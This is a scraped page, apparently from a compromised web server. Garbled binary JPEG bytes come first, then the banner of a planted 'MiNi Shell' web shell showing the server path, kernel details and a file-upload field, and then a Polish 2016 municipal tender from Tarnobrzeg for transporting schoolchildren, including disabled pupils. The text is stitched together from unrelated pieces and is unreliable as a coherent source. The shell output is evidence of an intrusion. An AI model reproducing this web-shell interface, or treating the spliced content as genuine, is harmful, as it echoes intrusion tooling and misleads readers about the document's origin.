JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160727/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160727/163009-N-2016.html

<p class="kh_header"><b>Tarnobrzeg: Świadczenie usług przewozowych uczniów i dzieci do szkół i placówek oświatowych w roku szkolnym 2016/2017</b><br>
<b>Numer ogłoszenia: 163009 - 2016; data zamieszczenia: 27.07.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Prezydent Miasta Tarnobrzega , ul. Kościuszki 32, 39-400 Tarnobrzeg, woj. podkarpackie, tel. 015 8226570, faks 015 8222504.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.tarnobrzeg.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług przewozowych uczniów i dzieci do szkół i placówek oświatowych w roku szkolnym 2016/2017.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest wykonanie zadania pn.: 

Świadczenie usług przewozowych uczniów i dzieci do szkół i  placówek oświatowych w roku szkolnym 2016/2017 

Przedmiotem zamówienia jest świadczenie usług przewozowych dzieci i uczniów do placówek oświatowych na terenie Gminy Tarnobrzeg w roku szkolnym 2016/2017. Dowożenie z miejsca zamieszkania do szkół i ze szkół do miejsca zamieszkania uczniów, będzie się odbywać w dniach realizowania przez placówki oświatowe zadań dydaktyczno-wychowawczych i opiekuńczych. 

1.1 Szczegółowy opis przedmiotu zamówienia 
W roku szkolnym 2016/2017 dowóz i odwóz dzieci i uczniów  odbywać się będzie na trasach:

Zadanie 1: Świadczenie usług przewozowych uczniów i dzieci do Szkoły Podstawowej nr 6, Przedszkola nr 6 i Zespołu Szkół Specjalnych w roku szkolnym 2016/2017

Przywóz- od poniedziałku do piątku, 1 raz dziennie na trasie:
Nagnajów (kapliczka), Nagnajów (wiadukt), Szkoła Podstawowa Nr 6, - ul. Mickiewicza 86, Ocice I, II, III, IV,V,  Szkoła Podstawowa nr 6 - ul. Mickiewicza 86, Przedszkole Nr 6 - ul. 1 Maja 14, Zespół Szkół Specjalnych - ul. M. Dąbrowskiej 10a
Przyjazd pod Zespół Szkół Specjalnych na godz. 8:00

Odwóz- od poniedziałku do piątku, 1 raz dziennie na trasie:
Zespół Szkół Specjalnych - ul. M. Dąbrowskiej 10a, Przedszkole Nr 6 - ul. 1 Maja 14, Szkoła Podstawowa nr 6 - ul. Mickiewicza 86, Ocice I, II, III, IV, V,  Szkoła Podstawowa nr 6 - ul. Mickiewicza 86, Nagnajów (wiadukt), Nagnajów  (kapliczka),
Wyjazd z Zespołu Szkół Specjalnych o godz. 14:30

27 osób + 1 lub 2 opiekunów; tj.
Szkoła Podstawowa nr 6 - 21 osób,
Przedszkole nr 6 - 1 osoba
Zespół Szkól Specjalnych - 5 osób

Pojazd używany do transportu dzieci niepełnosprawnych musi być przystosowany do przewozu osób niepełnosprawnych zgodnie z przepisami ustawy z dnia 20 czerwca 1997 r. Prawo o ruchu drogowym (tj. Dz. U. z 2012 r., poz. 1137 z późn. zm.). 
Wykonawca obliczając cenę przyjmuje szacunkową liczbę kursów w roku szkolnym 2016/2017 w liczbie 191 kursów.
Wykonawca przez określenie kurs rozumie- przywóz i odwóz dzieci wraz z opiekunami- z siedziby szkoły/przedszkola do miejsca określonego  w poszczególnych zadaniach.
Wykonawca zastrzega sobie prawo zmiany trasy, godziny dowozu i przywozu oraz zwiększenie liczby uczniów do 6.






Zadanie 2: Świadczenie usług przewozowych uczniów i dzieci do Szkoły Podstawowej nr 9 w roku szkolnym 2016/2017

Przywóz- od poniedziałku do piątku, 1 raz dziennie na trasie:
Ul. Warszawska (KOGA), ul. Warszawska 227 (Magdalena), ul. Warszawska (OSP-Zakrzów), 
ul. Przemysłowa (Przedszkole - Zakrzów), ul. Warszawska, Szkoła Podstawowa nr 9 - ul. Wiejska 4 
Przyjazd pod szkołę na godz.8:00
Odwóz I- od poniedziałku do piątku, 1 raz dziennie na trasie:
Szkoła Podstawowa nr 9 - ul. Wiejska 4, ul. Warszawska, ul. Przemysłowa (Przedszkole- Zakrzów), ul. Warszawska (OSP-Zakrzów), ul. Warszawska 227 (Magdalena), Ul. Warszawska (KOGA),
Wyjazd ze szkoły o godz. 13:50
Odwóz II- od poniedziałku do piątku, 1 raz dziennie na trasie:
Szkoła Podstawowa nr 9 - ul. Wiejska 4, ul. Warszawska, ul. Przemysłowa (Przedszkole- Zakrzów), ul. Warszawska (OSP-Zakrzów), ul. Warszawska 227 (Magdalena), Ul. Warszawska (KOGA),
Wyjazd ze szkoły o godz. 15:40

36 osób + 1 opiekun;  min. 36 miejsc siedzących 
Pojazd używany do transportu dzieci niepełnosprawnych musi być przystosowany do przewozu osób niepełnosprawnych zgodnie z przepisami ustawy z dnia 20 czerwca 1997 r. Prawo o ruchu drogowym (tj. Dz. U. z 2012 r., poz. 1137 z późn. zm.). 
Wykonawca obliczając cenę przyjmuje szacunkową liczbę kursów w roku szkolnym 2016/2017 w liczbie 191 kursów.
Wykonawca przez określenie kurs rozumie - przywóz i odwóz dzieci wraz z opiekunami - z siedziby szkoły/przedszkola do miejsca określonego w poszczególnych zadaniach.
Wykonawca zastrzega sobie prawo zmiany trasy, godziny dowozu i przywozu oraz zwiększenie liczby uczniów do 6.


Zadanie 3: Świadczenie usług przewozowych uczniów i dzieci do, Szkoły Podstawowej nr 9, Przedszkola nr 9,  Zespołu Szkół Specjalnych i Gimnazjum nr 2 w roku szkolnym 2016/2017


Przywóz- od poniedziałku do piątku, 1 raz dziennie na trasie:
ul. Skalna Góra, Plac Tysiąclecia (rondo), ul. 1 Maja (Tapima), ul. Moniuszki (Stokrotka), 
ul. Wyspiańskiego (US), ul. Kopernika I, ul. Kopernika II (przy G2),  ul. Sienkiewicza 63,  ul. Sikorskiego, ul. Zwierzyniecka (przy Żabce), Zespół Szkół Specjalnych - ul. Dąbrowskiej 10a, Szkoła Podstawowa nr 9, Przedszkole nr 9 - Wiejska 4;
Przyjazd do  Sp9, P9- 8:00

Odwóz- od poniedziałku do piątku, 1 raz dziennie na trasie:
Szkoła Podstawowa nr 9, Przedszkole nr 9- Wiejska 4; Zespół Szkół Specjalnych -ul. Dąbrowskiej 10a, Zwierzyniecka (przy Żabce), ul. Sikorskiego,  ul. Sienkiewicza 63, ul. Kopernika II (przy G2), Kopernika I, Wyspiańskiego (US), ul. Moniuszki (Stokrotka), ul. 1 Maja (Tapima),  Plac Tysiąclecia (rondo), ul. Skalna Góra.
Wyjazd z Sp9, P9 o godz. 15:00

21 osób, w tym 3 osoby na wózkach inwalidzkich +1 lub 2 opiekunów; tj.
Szkoła Podstawowa nr 9 - 11osób, w tym 2 osoby na wózku inwalidzkim,
Przedszkole nr 9 - 6 osób,
Zespół Szkół Specjalnych - 3 osoby,
Gimnazjum Nr 2 - 1 osoba na wózku

Okres ferii zimowych, wakacji, przerw świątecznych - do 39 kursów  
Przywóz- od poniedziałku do piątku, 1 raz dziennie na trasie:
ul. Skalna Góra, ul. Wyspiańskiego (US), ul. Kopernika I, ul. Kopernika II ul. Sienkiewicza 63, Zespół Szkół Specjalnych- Dąbrowskiej 10a, ul. Zwierzyniecka (Żabka),  Przedszkole nr 9 - ul. Wiejska 4;
Przyjazd do P9- 8:00
Odwóz- od poniedziałku do piątku, 1 raz dziennie na trasie:
Przedszkole nr 9- Wiejska 4, ul. Zwierzyniecka (Żabka), Zespół Szkół Specjalnych- Dąbrowskiej 10a, ul. Sienkiewicza 63, ul. Kopernika II, ul. Kopernika I, ul. Wyspiańskiego (US), ul. Skalna Góra, 
Wyjazd z  P9 godz. 13:00-15:00
6 osób + 1 opiekun;    
Dojazd w ferie, przerwy świąteczne i wakacje wg potrzeby placówki.
Pojazd używany do transportu dzieci niepełnosprawnych musi być przystosowany  do przewozu osób niepełnosprawnych zgodnie z przepisami ustawy  z dnia 20 czerwca 1997 r. Prawo o ruchu drogowym (tj. Dz. U. z 2012 r., poz. 1137 z późn. zm.). 
Wykonawca obliczając cenę przyjmuje szacunkową liczbę kursów w roku szkolnym 2016/2017 w liczbie 191 kursów.
Wykonawca przez określenie kurs rozumie- przywóz i odwóz dzieci wraz  z opiekunami- z siedziby szkoły/przedszkola do miejsca określonego w poszczególnych zadaniach.
Wykonawca zobowiązany jest do ujęcia w cenie do 39 dodatkowych kursów podczas ferii zimowych, wakacji - placówka nieferyjna Przedszkole nr 9 wg potrzeb placówki.
Wykonawca zastrzega sobie prawo zmiany trasy, godziny dowozu i przywozu oraz zwiększenie liczby uczniów do 6.


Zadanie 4: Świadczenie usług przewozowych uczniów i dzieci do Zespołu Szkół Specjalnych i Szkoły Podstawowej nr 9 w roku szkolnym 2016/2017

Przywóz- od poniedziałku do piątku, 1 raz dziennie na trasie:
ul. Zamkowa, ul. Sienkiewicza, al. Warszawska (przy cmentarzu), ul. Warszawska (przystanek oś Zakrzów przy numerze 201), ul. Jana Słomki, ul. Wiejska 4 (przy Szkole Podstawowej nr 9), Zespół Szkół Specjalnych - ul. M. Dąbrowskiej 10a 
Przyjazd pod szkołę- Zespół Szkól Specjalnych na godz.8:00
Odwóz- od poniedziałku do piątku, 1 raz dziennie na trasie:
Zespół Szkół Specjalnych - ul. M. Dąbrowskiej 10a, ul. Wiejska 4 (przy Szkole Podstawowej nr 9), ul. Jana Słomki, ul. Warszawska (przystanek oś Zakrzów przy numerze 201), al. Warszawska (przy cmentarzu), ul. Sienkiewicza, ul. Zamkowa 37, 
Wyjazd z Zespołu Szkół Specjalnych  o godz. 14:30;
11 osób, w tym 1 osoba na wózku inwalidzkim + 1 lub 2 opiekunów; tj.
Szkoła Podstawowa nr 9 - 1 osoba, 
Zespół Szkół Specjalnych - 10 osób, w tym 1 osoba na wózku

Pojazd używany do transportu dzieci niepełnosprawnych musi być przystosowany do przewozu osób niepełnosprawnych zgodnie z przepisami ustawy z dnia 20 czerwca 1997 r. Prawo o ruchu drogowym (tj. Dz. U. z 2012 r., poz. 1137 z późn. zm.). 
Wykonawca obliczając cenę przyjmuje szacunkową liczbę kursów w roku szkolnym 2016/2017 w liczbie 191 kursów.
Wykonawca przez określenie kurs rozumie- przywóz i odwóz dzieci wraz z opiekunami- z siedziby szkoły/przedszkola do miejsca określonego w poszczególnych zadaniach.
Wykonawca zastrzega sobie prawo zmiany trasy, godziny dowozu i przywozu oraz zwiększenie liczby uczniów do 6.

2. Zamawiający zastrzega sobie możliwość wprowadzenia na określone dni innego niż ustalony rozkład jazdy po wcześniejszym powiadomieniu Wykonawcy.
3. Zamawiający wymaga, aby Wykonawca dysponował autobusami z ilością miejsc 
w pojazdach lub odpowiednią liczbą autobusów, zapewniających dowóz wszystkich uczniów na poszczególnych trasach w wyznaczonych godzinach.
4.	 Wykonawca zobowiązuje się w przypadku awarii pojazdu w trakcie świadczenia usługi do niezwłocznego podstawienia zastępczego środka transportu (w terminie określonym w ofercie nie dłuższym niż 60 minut) - spełniającego wymogi, o których mowa w SIWZ  umożliwiając przywóz i odwóz dzieci.
5.	Zamawiający zastrzega sobie prawo zmiany ilości przewozów, terminów ich wykonywania, ze względu na okoliczności, których strony nie mogły przewidzieć w chwili zawarcia umowy.
6.	 Zamawiający wymaga aby pojazd do przewozu uczniów i dzieci niepełnosprawnych wyposażony był: 
- w odpowiednie oznakowanie pojazdu (przewóz dzieci, przewóz dzieci niepełnosprawnych) 
- fotele z pasami barkowo-biodrowymi posiadającymi  atest potwierdzony dokumentem homologacji dla 6 osób
- urządzenie (rampa, pochylnia, podnośnik lub platforma) umożliwiające wjazd wózków na pojazd i pasy lub mocowania przystosowane do zapinania wózków wewnątrz pojazdu
7. W dniu  zawarcia umowy nastąpi odbiór pojazdu do świadczenia usługi przewozowej. Jeżeli pojazd nie będzie spełniał warunków określonych w SIWZ, Wykonawca zobowiązany będzie w ciągu 24 godzin do podstawienia pojazdu spełniającego wymogi Zamawiającego. W sytuacji, gdy Wykonawca w terminie 24 godzin nie przedstawi pojazdu spełniającego wymagania SIWZ Zamawiający uzna, że Wykonawca odmawia  podpisania umowy w sprawie zamówienia publicznego i zgodnie z art.46 ust.5 zatrzyma wadium Wykonawcy.
8. Na Wykonawcy spoczywa obowiązek, zawarcia umowy ubezpieczenia dla każdego pojazdu (umowę obowiązkowego ubezpieczenia odpowiedzialności cywilnej  OC) i dostarczenia Zamawiającemu kopii umowy ubezpieczeniowej..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 60.12.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2017.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Wykonawca zobowiązany jest do wniesienia wadium w wysokości  Zad.1 - 1 600,00 zł /słownie: jeden tysiąc sześćset złotych /Zad.2 -  1 650,00 zł /słownie: jeden tysiąc sześćset pięćdziesiąt złotych/Zad/ 3 - 2 000,00 zł /słownie: dwa tysiące złotych/
Zad. 4 - 1 450,00 zł /słownie: jeden tysiąc czterysta pięćdziesiąt złotych/
 2. Wadium może być wniesione w następujących formach: a) pieniądzu; b) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym; c) gwarancjach bankowych; d) gwarancjach ubezpieczeniowych; e) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. 2007 nr 42, poz. 275). 3. W przypadku składania przez Wykonawcę wadium w formie gwarancji, gwarancja powinna być sporządzona zgodnie z obowiązującym prawem i winna zawierać następujące elementy: a) nazwę dającego zlecenie (Wykonawcy), beneficjenta gwarancji (Zamawiającego), gwaranta (banku lub instytucji ubezpieczeniowej udzielających gwarancji) oraz wskazanie ich siedzib, b) określenie wierzytelności, która ma być zabezpieczona gwarancją, c) kwotę gwarancji, d) termin ważności gwarancji, e) zobowiązanie gwaranta do: zapłacenia kwoty gwarancji na pierwsze pisemne żądanie zamawiającego, gdy wykonawca, którego ofertę wybrano: - w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy Pzp, z przyczyn leżących po jego stronie, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 ustawy Pzp, pełnomocnictw, listy podmiotów należących do tej samej grupy kapitałowej, o której mowa w art. 24.ust.2 pkt.5, lub informacji o tym, że nie należy do grupy kapitałowej, lub nie wyraził zgody na poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt. 3, co powodowało brak możliwości wybrania oferty złożonej przez Wykonawcę jako najkorzystniejszej., - odmówił podpisania umowy na warunkach określonych w ofercie, lub - nie wniósł zabezpieczenia należytego wykonania umowy, lub - zawarcie umowy stało się niemożliwe z przyczyn leżących po stronie Wykonawcy. 4. Postanowienia pkt IX ppkt 3 stosuje się odpowiednio do poręczeń, określonych powyżej w pkt IX ppkt 2 b) i e). 5. Miejsce i sposób wniesienia wadium: a) wadium wnoszone w pieniądzu należy wpłacić na następujący rachunek Zamawiającego: PKO S.A. I Oddział Tarnobrzeg 71 1240 2744 1111 0000 3990 9563 . Do oferty należy dołączyć kopię polecenia przelewu; b) wadium wnoszone w innych dopuszczonych przez Zamawiającego formach należy złożyć w formie oryginału w Urzędzie Miasta Tarnobrzega / kasa przy ul. Mickiewicza 7 / przed terminem składania ofert. Kopię należy dołączyć do oferty . 6. Termin wniesienia wadium. Wadium należy wnieść przed upływem terminu składania ofert, przy czym wniesienie wadium w pieniądzu za pomocą przelewu bankowego Zamawiający będzie uważał za skuteczne tylko wówczas, gdy bank prowadzący rachunek Zamawiającego potwierdzi, że otrzymał taki przelew przed upływem terminu składania ofert. W wymienionym przypadku dołączenie do oferty kopii polecenia przelewu wystawionego przez Wykonawcę jest warunkiem koniecznym, ale nie wystarczającym do stwierdzenia przez Zamawiającego terminowego wniesienia wadium przez Wykonawcę. 7. Zwrot wadium: a) zamawiający zwraca wadium wszystkim wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem wykonawcy, którego oferta została wybrana, jako najkorzystniejsza, z zastrzeżeniem pkt IX.8 a) specyfikacji b) wykonawcy, którego oferta została wybrana, jako najkorzystniejsza, zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy c) zamawiający zwraca niezwłocznie wadium na wniosek wykonawcy, który wycofał ofertę przed upływem terminu składania ofert Zamawiający żąda ponownego wniesienia wadium przez wykonawcę, któremu zwrócono wadium na podstawie pkt 7 a), jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przez zamawiającego. 8. Utrata wadium. Zamawiający zatrzymuje wadium wraz z odsetkami: a) jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy Pzp, z przyczyn leżących po jego stronie, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 ustawy Pzp, pełnomocnictw, listy podmiotów należących do tej samej grupy kapitałowej, o której mowa w art. 24.ust.2 pkt.5, lub informacji o tym, że nie należy do grupy kapitałowej, lub nie wyraził zgody na poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt. 3, co powodowało brak możliwości wybrania oferty złożonej przez Wykonawcę jako najkorzystniejszej. b) jeżeli Wykonawca, którego oferta została wybrana: - odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie; - nie wniósł wymaganego zabezpieczenia należytego wykonania umowy; - zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy. 9. Wykonawca zobowiązany jest wnieść wadium na okres związania ofertą 10. Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony jeżeli Wykonawca wykaże, że posiada licencję na krajowy transport drogowy wydaną na podstawie art. 5 ust. 1 ustawy z dnia 6 września 2001r. o transporcie drogowym (Dz. U. z 2007 r. Nr 125, poz. 874 z późn. zm.) stan prawny do dnia 15 sierpnia 2013r. lub posiada zezwolenie na wykonywanie zawodu przewoźnika drogowego uzyskane po dniu 15 sierpnia 2013r. na podstawie i zasadach określonych w art. 5 ust. 1 ustawy o transporcie drogowym (tekst jednolity: Dz. U.   z 2013r. poz. 1414 z późn. zm.) i rozporządzenia Parlamentu Europejskiego i Rady (WE) nr 1071/2009 ustanawiającego wspólne zasady dotyczące warunków wykonywania zawodu przewoźnika drogowego</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny. Zamawiający uzna warunek za spełniony poprzez złożenie przez wykonawcę oświadczenia o spełnianiu warunków udziału w postępowaniu według wzoru - zał. nr 3 do SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zad.1
Zamawiający uzna warunek za spełniony jeżeli Wykonawca wykaże,  że dysponuje lub będzie dysponował w chwili podpisania umowy w celu realizacji zamówienia pojazdem do przewozu dzieci spełniającym poniższe warunki:
- niskopodłogowy (w przypadku zaoferowania usługi autobusem),
- przystosowanym do przewozu osób niepełnosprawnych zgodnie z przepisami ustawy Prawo o ruchu drogowym (tj. Dz. U. z 2012 r., poz. 1137 z późn. zm.),
- nie starszy niż 2001 rok,
- posiadającym sprawne ogrzewanie,
- posiadającym oznakowanie pojazdu (przewóz dzieci),
- norma spalania EURO 2. 
Zad.2
Zamawiający uzna warunek za spełniony jeżeli Wykonawca wykaże,  że dysponuje lub będzie dysponował w chwili podpisania umowy w celu realizacji zamówienia pojazdem do przewozu dzieci spełniającym poniższe warunki:
- niskopodłogowy (w przypadku zaoferowania usługi autobusem),
- przystosowanym do przewozu osób niepełnosprawnych zgodnie z przepisami ustawy Prawo o ruchu drogowym (tj. Dz. U. z 2012 r., poz. 1137 z późn. zm.),
- nie starszy niż 2001 rok,
- posiadającym sprawne ogrzewanie,
- posiadającym oznakowanie pojazdu (przewóz dzieci),
- norma spalania EURO 2. 

Zad.3
Zamawiający uzna warunek za spełniony jeżeli Wykonawca wykaże,  że dysponuje lub będzie dysponował w chwili podpisania umowy w celu realizacji zamówienia pojazdem do przewozu dzieci spełniającym poniższe warunki:
- niskopodłogowy (w przypadku zaoferowania usługi autobusem),
- przystosowanym do przewozu osób niepełnosprawnych zgodnie z przepisami ustawy Prawo o ruchu drogowym (tj. Dz. U. z 2012 r., poz. 1137 z późn. zm.),
- nie starszy niż 2001 rok,
- posiadającym sprawne ogrzewanie,
- posiadającym oznakowanie pojazdu (przewóz dzieci),
- norma spalania EURO 2.

Zad.4
Zamawiający uzna warunek za spełniony jeżeli Wykonawca wykaże,  że dysponuje lub będzie dysponował w chwili podpisania umowy w celu realizacji zamówienia pojazdem do przewozu dzieci spełniającym poniższe warunki:
- niskopodłogowy (w przypadku zaoferowania usługi autobusem),
- przystosowanym do przewozu osób niepełnosprawnych zgodnie z przepisami ustawy Prawo o ruchu drogowym (tj. Dz. U. z 2012 r., poz. 1137 z późn. zm.),
- nie starszy niż 2001 rok,
- posiadającym sprawne ogrzewanie,
- posiadającym oznakowanie pojazdu (przewóz dzieci),
- norma spalania EURO 2. 


UWAGA: Spełnianie warunku dysponowania odpowiednim potencjałem technicznym należy wykazać osobno dla każdego z zadań.</p>
